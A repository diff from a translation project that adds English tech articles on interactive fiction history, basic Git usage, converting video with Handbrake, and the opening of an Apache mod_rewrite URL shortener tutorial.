本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://fedoramagazine.org
|
||||||
|
[1]:https://copr.fedorainfracloud.org/
|
||||||
|
[2]:http://hledger.org/
|
||||||
|
[3]:https://fedoramagazine.org/wp-content/uploads/2018/07/hledger.png
|
||||||
|
[4]:https://github.com/dylanaraps/neofetch
|
||||||
|
[5]:https://fedoramagazine.org/wp-content/uploads/2018/07/neofetch.png
|
||||||
|
[6]:https://remarkableapp.github.io/linux.html
|
||||||
|
[7]:https://fedoramagazine.org/wp-content/uploads/2018/07/remarkable.png
|
||||||
|
[8]:https://github.com/theZiz/aha
|
||||||
|
[9]:https://fedoramagazine.org/wp-content/uploads/2018/07/aha.png
|
||||||
|
[10]:https://copr.fedorainfracloud.org/coprs/scx/aha/
|
@ -0,0 +1,142 @@
|
|||||||
|
A brief history of text-based games and open source
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/compass_map_explore_adventure.jpg?itok=ecCoVTrZ)
|
||||||
|
|
||||||
|
The [Interactive Fiction Technology Foundation][1] (IFTF) is a non-profit organization dedicated to the preservation and improvement of technologies enabling the digital art form we call interactive fiction. When a Community Moderator for Opensource.com suggested an article about IFTF, the technologies and services it supports, and how it all intersects with open source, I found it a novel angle to the decades-long story I’ve so often told. The history of IF is longer than—but quite enmeshed with—the modern FOSS movement. I hope you’ll enjoy my sharing it here.
|
||||||
|
|
||||||
|
### Definitions and history
|
||||||
|
|
||||||
|
To me, the term interactive fiction includes any video game or digital artwork whose audience interacts with it primarily through text. The term originated in the 1980s when parser-driven text adventure games—epitomized in the United States by [Zork][2], [The Hitchhiker’s Guide to the Galaxy][3], and the rest of [Infocom][4]’s canon—defined home-computer entertainment. Its mainstream commercial viability had guttered by the 1990s, but online hobbyist communities carried on the tradition, releasing both games and game-creation tools.
|
||||||
|
|
||||||
|
After a quarter century, interactive fiction now comprises a broad and sparkling variety of work, from puzzle-laden text adventures to sprawling and introspective hypertexts. Regular online competitions and festivals provide a great place to peruse and play new work: The English-language IF world enjoys annual events including [Spring Thing][5] and [IFComp][6], the latter a centerpiece of modern IF since 1995—which also makes it the longest-lived continually running game showcase event of its kind in any genre. [IFComp’s crop of judged-and-ranked entries from 2017][7] shows the amazing diversity in form, style, and subject matter that text-based games boast today.
|
||||||
|
|
||||||
|
(I specify "English-language" above because IF communities tend to self-segregate by language, perhaps due to the technology's focus on writing. There are also annual IF events in [French][8] and [Italian][9], for example, and I've heard of at least one Chinese IF festival. Happily, these borders are porous; during the four years I managed IFComp, it has welcomed English-translated work from all international communities.)
|
||||||
|
|
||||||
|
![counterfeit monkey game screenshot][11]
|
||||||
|
|
||||||
|
Starting a new game of Emily Short's "Counterfeit Monkey," running on the interpreter Lectrote (both open source software).
|
||||||
|
|
||||||
|
Also due to its focus on text, IF presents some of the most accessible platforms for both play and authorship. Almost anyone who can read digital text—including users of assistive technology such as text-to-speech software—can play most IF works. Likewise, IF creation is open to all writers willing to learn and work with its tools and techniques.
|
||||||
|
|
||||||
|
This brings us to IF’s long relationship with open source, which has helped enable the art form’s availability since its commercial heyday. I'll provide an overview of contemporary open-source IF creation tools, and then discuss the ancient and sometimes curious tradition of IF works that share their source code.
|
||||||
|
|
||||||
|
### The world of open source IF tools
|
||||||
|
|
||||||
|
A number of development platforms, most of which are open source, are available to create traditional parser-driven IF in which the user types commands—for example, `go north,` `get lamp`, `pet the cat`, or `ask Zoe about quantum mechanics`—to interact with the game’s world. The early 1990s saw the emergence of several hacker-friendly parser-game development kits; those still in use today include [TADS][12], [Alan][13], and [Quest][14]—all open, with the latter two bearing FOSS licenses.
|
||||||
|
|
||||||
|
But by far the most prominent of these is [Inform][15], first released by Graham Nelson in 1993 and now maintained by a team Nelson still leads. Inform source is semi-open, in an unusual fashion: Inform 6, the previous major version, [makes its source available through the Artistic License][16]. This has more immediate relevance than may be obvious, since the otherwise proprietary Inform 7 holds Inform 6 at its core, translating its [remarkable natural-language syntax][17] into its predecessor’s more C-like code before letting it compile the work down into machine code.
|
||||||
|
|
||||||
|
![inform 7 IDE screenshot][19]
|
||||||
|
|
||||||
|
The Inform 7 IDE, loaded up with documentation and a sample project.
|
||||||
|
|
||||||
|
Inform games run on a virtual machine, a relic of the Infocom era when that publisher targeted a VM so that it could write a single game that would run on Apple II, Commodore 64, Atari 800, and other flavors of the "[home computer][20]." Fewer popular operating systems exist today, but Inform’s virtual machines—the relatively modern [Glulx][21] or the charmingly antique [Z-machine][22], a reverse-engineered clone of Infocom’s historical VM—let Inform-created work run on any computer with an Inform interpreter. Currently, popular cross-platform interpreters include desktop programs like [Lectrote][23] and [Gargoyle][24] or browser-based ones like [Quixe][25] and [Parchment][26]. All are open source.
|
||||||
|
|
||||||
|
If the pace of Inform’s development has slowed in its maturity, it remains vital through an active and transparent ecosystem—just like any other popular open source project. In Inform’s case, this includes the aforementioned interpreters, [a collection of language extensions][27] (usually written in a mix of Inform 6 and 7), and of course, all the work created with it and shared with the world, sometimes with source included (I’ll return to that topic later in this article).
|
||||||
|
|
||||||
|
IF creation tools invented in the 21st century tend to explore player interactions outside of the traditional parser, generating hypertext-driven work that any modern web browser can load. Chief among these is [Twine][28], originally developed by Chris Klimas in 2009 and under active development by many contributors today as [a GNU-licensed open source project][29]. (In fact, [Twine][30] can trace its OSS lineage back to [TiddlyWiki][31], the project from which Klimas initially derived it.)
|
||||||
|
|
||||||
|
Twine represents a sort of maximally [open and accessible approach][30] to IF development: Beyond its own FOSS nature, it renders its output as self-contained websites, relying not on machine code requiring further specialized interpretation but the open and well-exercised standards of HTML, CSS, and JavaScript. As a creative tool, Twine can match its own exposed complexity to the creator’s skill level. Users with little or no programming knowledge can create simple but playable IF work, while those with more coding and design skills—including those developing these skills by making Twine games—can develop more sophisticated projects. Little wonder that Twine’s visibility and popularity in educational contexts has grown quite a bit in recent years.
|
||||||
|
|
||||||
|
Other noteworthy open source IF development projects include the MIT-licensed [Undum][32] by Ian Millington, and [ChoiceScript][33] by Dan Fabulich and the [Choice of Games][34] team—both of which also target the web browser as the gameplay platform. Looking beyond strict development systems like these, web-based IF gives us a rich and ever-churning ecosystem of open source work, such as furkle’s [collection of Twine-extending tools][35] and Liza Daly’s [Windrift][36], a JavaScript framework purpose-built for her own IF games.
|
||||||
|
|
||||||
|
### Programs, games, and game-programs
|
||||||
|
|
||||||
|
Twine benefits from [a standing IFTF program dedicated to its support][37], allowing the public to help fund its maintenance and development. IFTF also directly supports two long-time public services, IFComp and the IF Archive, both of which depend upon and contribute back into open software and technologies.
|
||||||
|
|
||||||
|
![Harmonia opening screen shot][39]
|
||||||
|
|
||||||
|
The opening of Liza Daly's "Harmonia," created with the Windrift open source IF-creation framework.
|
||||||
|
|
||||||
|
The Perl- and JavaScript-based application that runs the IFComp’s website has been [a shared-source project][40] since 2014, and it reflects [the stew of FOSS licenses used by its IF-specific sub-components][41], including the various code libraries that allow parser-driven competition entries to run in a web browser. [The IF Archive][42]—online since 1992 and [an IFTF project since 2017][43]—is a set of mirrored repositories based entirely on ancient and stable internet standards, with [a little open source Python script][44] to handle indexing.
|
||||||
|
|
||||||
|
### At last, the fun part: Let's talk about open source text games
|
||||||
|
|
||||||
|
The bulk of the archive [comprises games][45], of course—years and years of games, reflecting decades of evolving game-design trends and IF tool development.
|
||||||
|
|
||||||
|
Lots of IF work shares its source code, and the community’s quick-start solution for finding it is simple: [Search the IFDB for the tag "source available"][46]. (The IFDB is yet another long-running IF community service, run privately by TADS creator Mike Roberts.) Users who are comfortable with a more bare-bones interface may also wish to browse [the `/games/source` directory][47] of the IF Archive, which groups content by development platform and written language (there's also a lot of work either too miscellaneous or too ancient to categorize floating at the top).
|
||||||
|
|
||||||
|
A little bit of random sampling of these code-sharing games reveals an interesting dilemma: Unlike the wider world of open source software, the IF community lacks a generally agreed-upon way of licensing all the code that it generates. Unlike a software tool—including all the tools we use to build IF—an interactive fiction game is a work of art in the most literal sense, meaning that an open source license intended for software would fit it no better than it would any other work of prose or poetry. But then again, an IF game is also a piece of software, and it exhibits source-code patterns and techniques that its creator may legitimately wish to share with the world. What is an open source-aware IF creator to do?
|
||||||
|
|
||||||
|
Some games address this by passing their code into the public domain, either through explicit license or—as in the case of [the original 42-year-old Adventure by Crowther and Woods][48]—through community fiat. Some try to split the difference, rolling their own license that allows for free re-use of a game’s exposed business logic but prohibits the creation of work derived specifically from its prose. This is the tack I took when I opened up the source of my own game, [The Warbler’s Nest][49]. Lord knows how well that’d stand up in court, but I didn’t have any better ideas at the time.
|
||||||
|
|
||||||
|
Naturally, you can find work that simply puts everything under a single common license and never mind the naysayers. A prominent example is [Emily Short’s epic Counterfeit Monkey][50], released in its entirety under a Creative Commons 4.0 license. [CC frowns at its application to code][51], but you could argue that [the strangely prose-like nature of Inform 7 source][52] makes it at least a little more compatible with a CC license than a more traditional software project would be.
|
||||||
|
|
||||||
|
### What now, adventurer?
|
||||||
|
|
||||||
|
If you are eager to start exploring the world of interactive fiction, here are a few links to check out:
|
||||||
|
|
||||||
|
|
||||||
|
+ As mentioned above, IFDB and the IF Archive both present browsable interfaces to more than 40 years worth of collected interactive fiction work. Much of this is playable in a web browser, but some require additional interpreter programs. IFDB can help you find and install these.
|
||||||
|
|
||||||
|
IFComp’s annual results pages provide another view into the best of this free and archive-available work.
|
||||||
|
|
||||||
|
+ The Interactive Fiction Technology Foundation is a charitable non-profit organization that helps support Twine, IFComp, and the IF Archive, as well as improve the accessibility of IF, explore IF’s use in education, and more. Join its mailing list to receive IFTF’s monthly newsletter, peruse its blog, and browse some thematic merchandise.
|
||||||
|
|
||||||
|
+ John Paul Wohlscheid wrote this article about open-source IF tools earlier this year. It covers some platforms not mentioned here, so if you’re still hungry for more, have a look.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/interactive-fiction-tools
|
||||||
|
|
||||||
|
作者:[Jason Mclntosh][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/jmac
|
||||||
|
[1]:http://iftechfoundation.org/
|
||||||
|
[2]:https://en.wikipedia.org/wiki/Zork
|
||||||
|
[3]:https://en.wikipedia.org/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(video_game)
|
||||||
|
[4]:https://en.wikipedia.org/wiki/Infocom
|
||||||
|
[5]:http://www.springthing.net/
|
||||||
|
[6]:http://ifcomp.org/
|
||||||
|
[7]:https://ifcomp.org/comp/2017
|
||||||
|
[8]:http://www.fiction-interactive.fr/
|
||||||
|
[9]:http://www.oldgamesitalia.net/content/marmellata-davventura-2018
|
||||||
|
[10]:/file/403396
|
||||||
|
[11]:https://opensource.com/sites/default/files/uploads/monkey.png (counterfeit monkey game screenshot)
|
||||||
|
[12]:http://tads.org/
|
||||||
|
[13]:https://www.alanif.se/
|
||||||
|
[14]:http://textadventures.co.uk/quest/
|
||||||
|
[15]:http://inform7.com/
|
||||||
|
[16]:https://github.com/DavidKinder/Inform6
|
||||||
|
[17]:http://inform7.com/learn/man/RB_4_1.html#e307
|
||||||
|
[18]:/file/403386
|
||||||
|
[19]:https://opensource.com/sites/default/files/uploads/inform.png (inform 7 IDE screenshot)
|
||||||
|
[20]:https://www.youtube.com/watch?v=bu55q_3YtOY
|
||||||
|
[21]:http://ifwiki.org/index.php/Glulx
|
||||||
|
[22]:http://ifwiki.org/index.php/Z-machine
|
||||||
|
[23]:https://github.com/erkyrath/lectrote
|
||||||
|
[24]:https://github.com/garglk/garglk/
|
||||||
|
[25]:http://eblong.com/zarf/glulx/quixe/
|
||||||
|
[26]:https://github.com/curiousdannii/parchment
|
||||||
|
[27]:https://github.com/i7/extensions
|
||||||
|
[28]:http://twinery.org/
|
||||||
|
[29]:https://github.com/klembot/twinejs
|
||||||
|
[30]:/article/18/7/twine-vs-renpy-interactive-fiction
|
||||||
|
[31]:https://tiddlywiki.com/
|
||||||
|
[32]:https://github.com/idmillington/undum
|
||||||
|
[33]:https://github.com/dfabulich/choicescript
|
||||||
|
[34]:https://www.choiceofgames.com/
|
||||||
|
[35]:https://github.com/furkle
|
||||||
|
[36]:https://github.com/lizadaly/windrift
|
||||||
|
[37]:http://iftechfoundation.org/committees/twine/
|
||||||
|
[38]:/file/403391
|
||||||
|
[39]:https://opensource.com/sites/default/files/uploads/harmonia.png (Harmonia opening screen shot)
|
||||||
|
[40]:https://github.com/iftechfoundation/ifcomp
|
||||||
|
[41]:https://github.com/iftechfoundation/ifcomp/blob/master/LICENSE.md
|
||||||
|
[42]:https://www.ifarchive.org/
|
||||||
|
[43]:http://blog.iftechfoundation.org/2017-06-30-iftf-is-adopting-the-if-archive.html
|
||||||
|
[44]:https://github.com/iftechfoundation/ifarchive-ifmap-py
|
||||||
|
[45]:https://www.ifarchive.org/indexes/if-archiveXgames
|
||||||
|
[46]:http://ifdb.tads.org/search?sortby=ratu&searchfor=%22source+available%22
|
||||||
|
[47]:https://www.ifarchive.org/indexes/if-archiveXgamesXsource.html
|
||||||
|
[48]:http://ifdb.tads.org/viewgame?id=fft6pu91j85y4acv
|
||||||
|
[49]:https://github.com/jmacdotorg/warblers-nest/
|
||||||
|
[50]:https://github.com/i7/counterfeit-monkey
|
||||||
|
[51]:https://creativecommons.org/faq/#can-i-apply-a-creative-commons-license-to-software
|
||||||
|
[52]:https://github.com/i7/counterfeit-monkey/blob/master/Counterfeit%20Monkey.materials/Extensions/Counterfeit%20Monkey/Liquids.i7x
|
193
sources/tech/20180720 An Introduction to Using Git.md
Normal file
193
sources/tech/20180720 An Introduction to Using Git.md
Normal file
@ -0,0 +1,193 @@
|
|||||||
|
translating by distant1219
|
||||||
|
|
||||||
|
An Introduction to Using Git
|
||||||
|
======
|
||||||
|
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/developer-3461405_1920.png?itok=6H3sYe80)
|
||||||
|
If you’re a developer, then you know your way around development tools. You’ve spent years studying one or more programming languages and have perfected your skills. You can develop with GUI tools or from the command line. On your own, nothing can stop you. You code as if your mind and your fingers are one to create elegant, perfectly commented, source for an app you know will take the world by storm.
|
||||||
|
|
||||||
|
But what happens when you’re tasked with collaborating on a project? Or what about when that app you’ve developed becomes bigger than just you? What’s the next step? If you want to successfully collaborate with other developers, you’ll want to make use of a distributed version control system. With such a system, collaborating on a project becomes incredibly efficient and reliable. One such system is [Git][1]. Along with Git comes a handy repository called [GitHub][2], where you can house your projects, such that a team can check out and check in code.
|
||||||
|
|
||||||
|
I will walk you through the very basics of getting Git up and running and using it with GitHub, so the development on your game-changing app can be taken to the next level. I’ll be demonstrating on Ubuntu 18.04, so if your distribution of choice is different, you’ll only need to modify the Git install commands to suit your distribution’s package manager.
|
||||||
|
|
||||||
|
### Git and GitHub
|
||||||
|
|
||||||
|
The first thing to do is create a free GitHub account. Head over to the [GitHub signup page][3] and fill out the necessary information. Once you’ve done that, you’re ready to move on to installing Git (you can actually do these two steps in any order).
|
||||||
|
|
||||||
|
Installing Git is simple. Open up a terminal window and issue the command:
|
||||||
|
```
|
||||||
|
sudo apt install git-all
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
This will include a rather large number of dependencies, but you’ll wind up with everything you need to work with Git and GitHub.
|
||||||
|
|
||||||
|
On a side note: I use Git quite a bit to download source for application installation. There are times when a piece of software isn’t available via the built-in package manager. Instead of downloading the source files from a third-party location, I’ll often go the project’s Git page and clone the package like so:
|
||||||
|
```
|
||||||
|
git clone ADDRESS
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Where ADDRESS is the URL given on the software’s Git page.
|
||||||
|
Doing this most always ensures I am installing the latest release of a package.
|
||||||
|
|
||||||
|
Create a local repository and add a file
|
||||||
|
|
||||||
|
The next step is to create a local repository on your system (we’ll call it newproject and house it in ~/). Open up a terminal window and issue the commands:
|
||||||
|
```
|
||||||
|
cd ~/
|
||||||
|
|
||||||
|
mkdir newproject
|
||||||
|
|
||||||
|
cd newproject
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Now we must initialize the repository. In the ~/newproject folder, issue the command git init. When the command completes, you should see that the empty Git repository has been created (Figure 1).
|
||||||
|
|
||||||
|
![new repository][5]
|
||||||
|
|
||||||
|
Figure 1: Our new repository has been initialized.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
Next we need to add a file to the project. From within the root folder (~/newproject) issue the command:
|
||||||
|
```
|
||||||
|
touch readme.txt
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
You will now have an empty file in your repository. Issue the command git status to verify that Git is aware of the new file (Figure 2).
|
||||||
|
|
||||||
|
![readme][8]
|
||||||
|
|
||||||
|
Figure 2: Git knows about our readme.txt file.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
Even though Git is aware of the file, it hasn’t actually been added to the project. To do that, issue the command:
|
||||||
|
```
|
||||||
|
git add readme.txt
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Once you’ve done that, issue the git status command again to see that readme.txt is now considered a new file in the project (Figure 3).
|
||||||
|
|
||||||
|
![file added][10]
|
||||||
|
|
||||||
|
Figure 3: Our file now has now been added to the staging environment.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
### Your first commit
|
||||||
|
|
||||||
|
With the new file in the staging environment, you are now ready to create your first commit. What is a commit? Easy: A commit is a record of the files you’ve changed within the project. Creating the commit is actually quite simple. It is important, however, that you include a descriptive message for the commit. By doing this, you are adding notes about what the commit contains (such as what changes you’ve made to the file). Before we do this, however, we have to inform Git who we are. To do this, issue the command:
|
||||||
|
```
|
||||||
|
git config --global user.email EMAIL
|
||||||
|
|
||||||
|
git config --global user.name “FULL NAME”
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Where EMAIL is your email address and FULL NAME is your name.
|
||||||
|
|
||||||
|
Now we can create the commit by issuing the command:
|
||||||
|
```
|
||||||
|
git commit -m “Descriptive Message”
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Where Descriptive Message is your message about the changes within the commit. For example, since this is the first commit for the readme.txt file, the commit could be:
|
||||||
|
```
|
||||||
|
git commit -m “First draft of readme.txt file”
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
You should see output indicating that 1 file has changed and a new mode was created for readme.txt (Figure 4).
|
||||||
|
|
||||||
|
![success][12]
|
||||||
|
|
||||||
|
Figure 4: Our commit was successful.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
### Create a branch and push it to GitHub
|
||||||
|
|
||||||
|
Branches are important, as they allow you to move between project states. Let’s say you want to create a new feature for your game-changing app. To do that, create a new branch. Once you’ve completed work on the feature you can merge this feature from the branch to the master branch. To create the new branch, issue the command:
|
||||||
|
|
||||||
|
git checkout -b BRANCH
|
||||||
|
|
||||||
|
where BRANCH is the name of the new branch. Once the command completes, issue the command git branch to see that it has been created (Figure 5).
|
||||||
|
|
||||||
|
![featureX][14]
|
||||||
|
|
||||||
|
Figure 5: Our new branch, called featureX.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
Next we need to create a repository on GitHub. If you log into your GitHub account, click the New Repository button from your account main page. Fill out the necessary information and click Create repository (Figure 6).
|
||||||
|
|
||||||
|
![new repository][16]
|
||||||
|
|
||||||
|
Figure 6: Creating the new repository on GitHub.
|
||||||
|
|
||||||
|
[Used with permission][6]
|
||||||
|
|
||||||
|
After creating the repository, you will be presented with a URL to use for pushing our local repository. To do this, go back to the terminal window (still within ~/newproject) and issue the commands:
|
||||||
|
```
|
||||||
|
git remote add origin URL
|
||||||
|
|
||||||
|
git push -u origin master
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Where URL is the url for our new GitHub repository.
|
||||||
|
|
||||||
|
You will be prompted for your GitHub username and password. Once you successfully authenticate, the project will be pushed to your GitHub repository and you’re ready to go.
|
||||||
|
|
||||||
|
### Pulling the project
|
||||||
|
|
||||||
|
Say your collaborators make changes to the code on the GitHub project and have merged those changes. You will then need to pull the project files to your local machine, so the files you have on your system match those on the remote account. To do this, issue the command (from within ~/newproject):
|
||||||
|
```
|
||||||
|
git pull origin master
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
The above command will pull down any new or changed files to your local repository.
|
||||||
|
|
||||||
|
### The very basics
|
||||||
|
|
||||||
|
And that is the very basics of using Git from the command line to work with a project stored on GitHub. There is quite a bit more to learn, so I highly recommend you issue the commands man git, man git-push, and man git-pull to get a more in-depth understanding of what the git command can do.
|
||||||
|
|
||||||
|
Happy developing!
|
||||||
|
|
||||||
|
Learn more about Linux through the free ["Introduction to Linux" ][17]course from The Linux Foundation and edX.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://www.linux.com/learn/intro-to-linux/2018/7/introduction-using-git
|
||||||
|
|
||||||
|
作者:[Jack Wallen][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://www.linux.com/users/jlwallen
|
||||||
|
[1]:https://git-scm.com/
|
||||||
|
[2]:https://github.com/
|
||||||
|
[3]:https://github.com/join?source=header-home
|
||||||
|
[4]:/files/images/git1jpg
|
||||||
|
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_1.jpg?itok=FKkr5Mrk (new repository)
|
||||||
|
[6]:https://www.linux.com/licenses/category/used-permission
|
||||||
|
[7]:/files/images/git2jpg
|
||||||
|
[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_2.jpg?itok=54G9KBHS (readme)
|
||||||
|
[9]:/files/images/git3jpg
|
||||||
|
[10]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_3.jpg?itok=KAJwRJIB (file added)
|
||||||
|
[11]:/files/images/git4jpg
|
||||||
|
[12]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_4.jpg?itok=qR0ighDz (success)
|
||||||
|
[13]:/files/images/git5jpg
|
||||||
|
[14]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_5.jpg?itok=6m9RTWg6 (featureX)
|
||||||
|
[15]:/files/images/git6jpg
|
||||||
|
[16]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/git_6.jpg?itok=d2toRrUq (new repository)
|
||||||
|
[17]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
57
sources/tech/20180720 Convert video using Handbrake.md
Normal file
57
sources/tech/20180720 Convert video using Handbrake.md
Normal file
@ -0,0 +1,57 @@
|
|||||||
|
translating---geekpi
|
||||||
|
|
||||||
|
Convert video using Handbrake
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OpenVideo.png?itok=jec9ibU5)
|
||||||
|
|
||||||
|
Recently, when my son asked me to digitally convert some old DVDs of his high school basketball games, I immediately knew I would use [Handbrake][1]. It is an open source package that has all the tools necessary to easily convert video into formats that can be played on MacOS, Windows, Linux, iOS, Android, and other platforms.
|
||||||
|
|
||||||
|
Handbrake is open source and distributable under the [GPLv2 license][2]. It's easy to install on MacOS, Windows, and Linux, including both [Fedora][3] and [Ubuntu][4]. In Linux, once it's installed, it can be launched from the command line with `$ handbrake` or selected from the graphical user interface. (In my case, that is GNOME 3.)
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_1.png)
|
||||||
|
|
||||||
|
Handbrake's menu system is easy to use. Click on **Open Source** to select the video source you want to convert. For my son's basketball videos, that is the DVD drive in my Linux laptop. After inserting the DVD into the drive, the software identifies the contents of the disk.
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_2.png)
|
||||||
|
|
||||||
|
As you can see next to Source in the screenshot above, Handbrake recognizes it as a DVD with a 720x480 video in 4:3 aspect ratio, recorded at 29.97 frames per second, with one audio track. The software also previews the video.
|
||||||
|
|
||||||
|
If the default conversion settings are acceptable, just press the **Start Encoding** button and (after a period of time, depending on the speed of your processor) the DVD's contents will be converted and saved in the default format, [M4V][5] (which can be changed).
|
||||||
|
|
||||||
|
If you don't like the filename, it's easy to change it.
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_3.png)
|
||||||
|
|
||||||
|
Handbrake has a variety of output options for format, size, and disposition. For example, it can produce video optimized for YouTube, Vimeo, and other websites, as well as for devices including iPod, iPad, Apple TV, Amazon Fire TV, Roku, PlayStation, and more.
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_4.png)
|
||||||
|
|
||||||
|
You can change the video output size in the Dimensions menu tab. Other tabs allow you to apply filters, change video quality and encoding, add or modify an audio track, include subtitles, and modify chapters. The Tags menu tab lets you identify the author, actors, director, release date, and more on the output video file.
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_5.png)
|
||||||
|
|
||||||
|
If you want to set Handbrake to produce output for a specific platform, you can use the included presets.
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/uploads/handbrake_6.png)
|
||||||
|
|
||||||
|
You can also use the menu options to create your own format, depending on the functionality you want.
|
||||||
|
|
||||||
|
Handbrake is an incredibly powerful piece of software, but it's not the only open source video conversion tool out there. Do you have another favorite? If so, please share in the comments.
|
||||||
|
|
||||||
|
--------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
via: https://opensource.com/article/18/7/handbrake
|
||||||
|
|
||||||
|
作者:[Don Watkins][a]
|
||||||
|
选题:[lujun9972](https://github.com/lujun9972)
|
||||||
|
译者:[译者ID](https://github.com/译者ID)
|
||||||
|
校对:[校对者ID](https://github.com/校对者ID)
|
||||||
|
|
||||||
|
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||||
|
|
||||||
|
[a]:https://opensource.com/users/don-watkins
|
||||||
|
[1]:https://handbrake.fr/
|
||||||
|
[2]:https://github.com/HandBrake/HandBrake/blob/master/LICENSE
|
||||||
|
[3]:https://fedora.pkgs.org/28/rpmfusion-free-x86_64/HandBrake-1.1.0-1.fc28.x86_64.rpm.html
|
||||||
|
[4]:https://launchpad.net/~stebbins/+archive/ubuntu/handbrake-releases
|
||||||
|
[5]:https://en.wikipedia.org/wiki/M4V
|
@ -0,0 +1,82 @@
|
|||||||
|
How to build a URL shortener with Apache
|
||||||
|
======
|
||||||
|
|
||||||
|
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/openweb-osdc-lead.png?itok=yjU4KliG)
|
||||||
|
|
||||||
|
Long ago, folks started sharing links on Twitter. The 140-character limit meant that URLs might consume most (or all) of a tweet, so people turned to URL shorteners. Eventually, Twitter added a built-in URL shortener ([t.co][1]).
|
||||||
|
|
||||||
|
Character count isn't as important now, but there are still other reasons to shorten links. For one, the shortening service may provide analytics—you can see how popular the links are that you share. It also simplifies making easy-to-remember URLs. For example, [bit.ly/INtravel][2] is much easier to remember than <https://www.in.gov/ai/appfiles/dhs-countyMap/dhsCountyMap.html>. And URL shorteners can come in handy if you want to pre-share a link but don't know the final destination yet.
|
||||||
|
|
||||||
|
Like any technology, URL shorteners aren't all positive. By masking the ultimate destination, shortened links can be used to direct people to malicious or offensive content. But if you surf carefully, URL shorteners are a useful tool.
|
||||||
|
|
||||||
|
We [covered shorteners previously][3] on this site, but maybe you want to run something simple that's powered by a text file. In this article, we'll show how to use the Apache HTTP server's mod_rewrite feature to set up your own URL shortener. If you're not familiar with the Apache HTTP server, check out David Both's article on [installing and configuring][4] it.
|
||||||
|
|
||||||
|
### Create a VirtualHost
|
||||||
|
|
||||||
|
In this tutorial, I'm assuming you bought a cool domain that you'll use exclusively for the URL shortener. For example, my website is [funnelfiasco.com][5] , so I bought [funnelfias.co][6] to use for my URL shortener (okay, it's not exactly short, but it feeds my vanity). If you won't run the shortener as a separate domain, skip to the next section.
|
||||||
|
|
||||||
|
The first step is to set up the VirtualHost that will be used for the URL shortener. For more information on VirtualHosts, see [David Both's article][7]. This setup requires just a few basic lines:
|
||||||
|
```
|
||||||
|
<VirtualHost *:80>
|
||||||
|
|
||||||
|
ServerName funnelfias.co
|
||||||
|
|
||||||
|
</VirtualHost>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
### Create the rewrites
|
||||||
|
|
||||||
|
This service uses HTTPD's rewrite engine to rewrite the URLs. If you created a VirtualHost in the section above, the configuration below goes into your VirtualHost section. Otherwise, it goes in the VirtualHost or main HTTPD configuration for your server.
|
||||||
|
```
|
||||||
|
RewriteEngine on
|
||||||
|
|
||||||
|
RewriteMap shortlinks txt:/data/web/shortlink/links.txt
|
||||||
|
|
||||||
|
RewriteRule ^/(.+)$ ${shortlinks:$1} [R=temp,L]
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
